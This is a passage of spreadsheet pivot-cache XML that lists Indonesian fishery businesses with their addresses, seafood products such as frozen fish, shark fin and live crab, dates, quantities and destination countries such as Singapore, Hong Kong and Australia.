  </r>
  <r>
    <n v="20689"/>
    <x v="225"/>
    <s v="PT. ROHTADI"/>
    <s v="Jl. Tikala Kumaraka Lingkungan III No.23, Kel. Tikala Kumaraka, Kec. Tikala, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="20691"/>
    <x v="283"/>
    <s v="PT. ARAFURA MARINE CULTURE"/>
    <s v="Desa Ujir, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakap)"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="20692"/>
    <x v="283"/>
    <s v="PT. ARAFURA MARINE CULTURE"/>
    <s v="Desa Ujir, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="20767"/>
    <x v="284"/>
    <s v="BU SRI"/>
    <s v="Jl. Kuala Lempuing No.18, Kel. Lempuing, Kec. Ratu Agung, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Abon Tuna"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1440"/>
    <s v="Kota Bengkulu"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="17247"/>
    <x v="285"/>
    <s v="MULIA ARIS FISHERY"/>
    <s v="Pelantar Asam Gg II RT 02 RW 07, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="500"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17735"/>
    <x v="285"/>
    <s v="MULIA ARIS FISHERY"/>
    <s v="Pelantar Asam Gg II RT 02 RW 07, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Mata Besar, Manyung, Kerapu, Kakap, Kurisi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17736"/>
    <x v="285"/>
    <s v="MULIA ARIS FISHERY"/>
    <s v="Pelantar Asam Gg II RT 02 RW 07, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri, Selar Kuning)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19907"/>
    <x v="181"/>
    <s v="PT. INDONESIA MARICULTURE INDUSTRIES (KM. MITRA KARIMUN-3)"/>
    <s v="Pulau Murai Batu, Kel. Keban, Kec. Moro, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Hidup (Kakap Putih)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19932"/>
    <x v="286"/>
    <s v="PT. SUMBER JAYA MAKMUR KELAUTAN"/>
    <s v="Kampung Bagan RT 002 RW 009, Kel. Tanjung Piayu, Kec. Sungai Beduk, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20156"/>
    <x v="270"/>
    <s v="SUKIRMAN"/>
    <s v="Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Sebelah, Kerapu, Bawal, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20157"/>
    <x v="270"/>
    <s v="SUKIRMAN"/>
    <s v="Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Selar, Tenggiri)"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20158"/>
    <x v="270"/>
    <s v="SUKIRMAN"/>
    <s v="Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20246"/>
    <x v="287"/>
    <s v="PT. SUMBER WALET ALAM"/>
    <s v="Komplek Rezeki Graha Mas Blok G No.15, Kel. Sungai Panas, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Teripang Kering"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="250"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20247"/>
    <x v="287"/>
    <s v="PT. SUMBER WALET ALAM"/>
    <s v="Komplek Rezeki Graha Mas Blok G No.15, Kel. Sungai Panas, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Teri Kering"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="100"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20490"/>
    <x v="170"/>
    <s v="BIDIN"/>
    <s v="Jl. Pelantar I No.59 H RT 003 RW 008, Kel. Tanjung Pinang Kota, Kec. Tanjung Pinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Tamban, Benggol, Tenggiri, Selar Kuning)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="16722"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="17016"/>
    <x v="288"/>
    <s v="JONO"/>
    <s v="Jl, Baran Satu Meral RT 002 RW 003, Kel, Baran, Kec, Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Lemuru, Mata Besar, Tongkol, Kembung, Talang-talang, Sarden, Selar, Tenggiri)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17018"/>
    <x v="288"/>
    <s v="JONO"/>
    <s v="Jl, Baran Satu Meral RT 002 RW 003, Kel, Baran, Kec, Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Malong, Gulama, Bawal, Layur, Alu-alu, Kerapu, Gerot-gerot, Jebung, Jenaha, Kakap, Kurau, Parang-parang, Ekor Kuning)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17019"/>
    <x v="288"/>
    <s v="JONO"/>
    <s v="Jl, Baran Satu Meral RT 002 RW 003, Kel, Baran, Kec, Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Malong, Gulama, Bawal, Layur, Alu-alu, Kerapu, Gerot-gerot, Jebung, Jenaha, Kakap, Kurau, Parang-parang, Ekor Kuning)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17099"/>
    <x v="278"/>
    <s v="PT. NEPTUNA DWINDO MATRINA"/>
    <s v="Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17101"/>
    <x v="278"/>
    <s v="PT. NEPTUNA DWINDO MATRINA"/>
    <s v="Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Deho, Selar, Layang, Tamban, Tenggiri)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17103"/>
    <x v="278"/>
    <s v="PT. NEPTUNA DWINDO MATRINA"/>
    <s v="Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Pisang-pisang, Anggoli, Kerapu, Jebung, Ilak, Kakap, Ekor Kuning)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17147"/>
    <x v="278"/>
    <s v="PT. NEPTUNA DWINDO MATRINA"/>
    <s v="Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Pisang-pisang, Anggoli, Kerapu, Jebung, ilak, Kakap, Ekor Kuning)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17711"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17713"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17720"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Malong, Lencam, Biji Nangka, Kuniran, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro, Kurisi)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19423"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="19777"/>
    <x v="290"/>
    <s v="PT. SURYA FRESHINDO INTIMAS"/>
    <s v="Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20106"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Mauritius"/>
  </r>
  <r>
    <n v="20107"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="20188"/>
    <x v="291"/>
    <s v="PT. FININDO BATAM"/>
    <s v="Komplek Harbour View Blok A No.07, Kel. Sungai Jodoh, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="62000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20189"/>
    <x v="291"/>
    <s v="PT. FININDO BATAM"/>
    <s v="Komplek Harbour View Blok A No.07, Kel. Sungai Jodoh, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Sirip Hiu Beku, Kulit Hiu Beku, Tulang Hiu Beku"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="62000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20279"/>
    <x v="164"/>
    <s v="PT. SARI SEGAR LAUT INDONESIA"/>
    <s v="Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Todak)"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="8000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20345"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="20347"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerisi, Lencam, Kerapu, Layur, Kakap, Ekor Kuning, Barramundi)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="20349"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Bonito, Tongkol, Kuwe, Layaran, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="20535"/>
    <x v="292"/>
    <s v="CV. MUTIARA NUSA TIMUR"/>
    <s v="Jl. Tomangambari, Kel. Songka, Kec. Wara Selatan, Kota Palopo&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20596"/>
    <x v="188"/>
    <s v="PT. LAUT UNITED"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Kembung, Selayang, Selar, Cakalang, Tenggiri, Selar Kuning)"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="15800"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="20725"/>
    <x v="293"/>
    <s v="PT. KIANTAKA RASA"/>
    <s v="Jl. Raya Serang Km 12,5, Kampung Kadu RT 006 RW 001, Kel. Bunder, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Refined Carrageenan"/>
    <d v="2020-12-14T00:00:00"/>
    <n v="100000000"/>
    <m/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="21098"/>
    <x v="281"/>
    <s v="PT. BLAMBANGAN FOODPACKERS INDONESIA"/>
    <s v="Jl. Sampangan No. 1, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Bekicot Kaleng"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21101"/>
    <x v="294"/>
    <s v="CV. DJOSAN"/>
    <s v="Ruko Graha Dika Blok A 04-05, Kel. Semampir, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rajungan Segar"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21105"/>
    <x v="294"/>
    <s v="CV. DJOSAN"/>
    <s v="Ruko Graha Dika Blok A 04-05, Kel. Semampir, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Segar"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21157"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="33000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21158"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21159"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21160"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21161"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21162"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tulang Hiu Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21164"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21175"/>
    <x v="260"/>
    <s v="PT. SAMUDRA KENCANA MINA"/>
    <s v="Pergudangan Central Square Blok E 31, Jl. Ahmad Yani No.41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Lemadang, Marlin, Gindara, Sarden, Cakalang)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="54000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="21315"/>
    <x v="2"/>
    <s v="PT. ALAM JAYA"/>
    <s v="JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Anggoli, Kakap Merah)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21316"/>
    <x v="2"/>
    <s v="PT. ALAM JAYA"/>
    <s v="JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20529"/>
    <x v="137"/>
    <s v="PT. OSEANIK NUSA GLOBAL"/>
    <s v="Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah Room CS-4A Blok B/37 RT 004 RW 003, Kel. Jurumundi, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kembung, Makerel, Salem, Sarden)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jambi, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Tangerang, Kota Pontianak"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="20844"/>
    <x v="236"/>
    <s v="PT. HASIL LAUT BERSAMA"/>
    <s v="Jl. Garuda, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung, Sarden, Tenggiri)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Pekanbaru, Kota Jambi, Kota Palembang"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20845"/>
    <x v="236"/>
    <s v="PT. HASIL LAUT BERSAMA"/>
    <s v="Jl. Garuda, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Malong, Samge)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Pekanbaru, Kota Jambi, Kota Palembang"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20431"/>
    <x v="295"/>
    <s v="PT. SARI LAUT JAYA LESTARI"/>
    <s v="Jl. Sampangan No.18, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Banyuwangi, Kota Surabaya"/>
    <s v="Cambodia"/>
  </r>
  <r>
    <n v="20314"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kerang Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="64000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="16713"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kabupaten Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bandeng Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="40000"/>
    <s v="Kabupaten Semarang"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20197"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Lamongan"/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="20317"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Siput Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21365"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="20510"/>
    <x v="152"/>
    <s v="CV. LAUT SARI AGUNG"/>
    <s v="Jl. Malaka, Kel. Batu Nampar Selatan, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Lobster Hidup"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="6000"/>
    <s v="Kabupaten Gianyar"/>
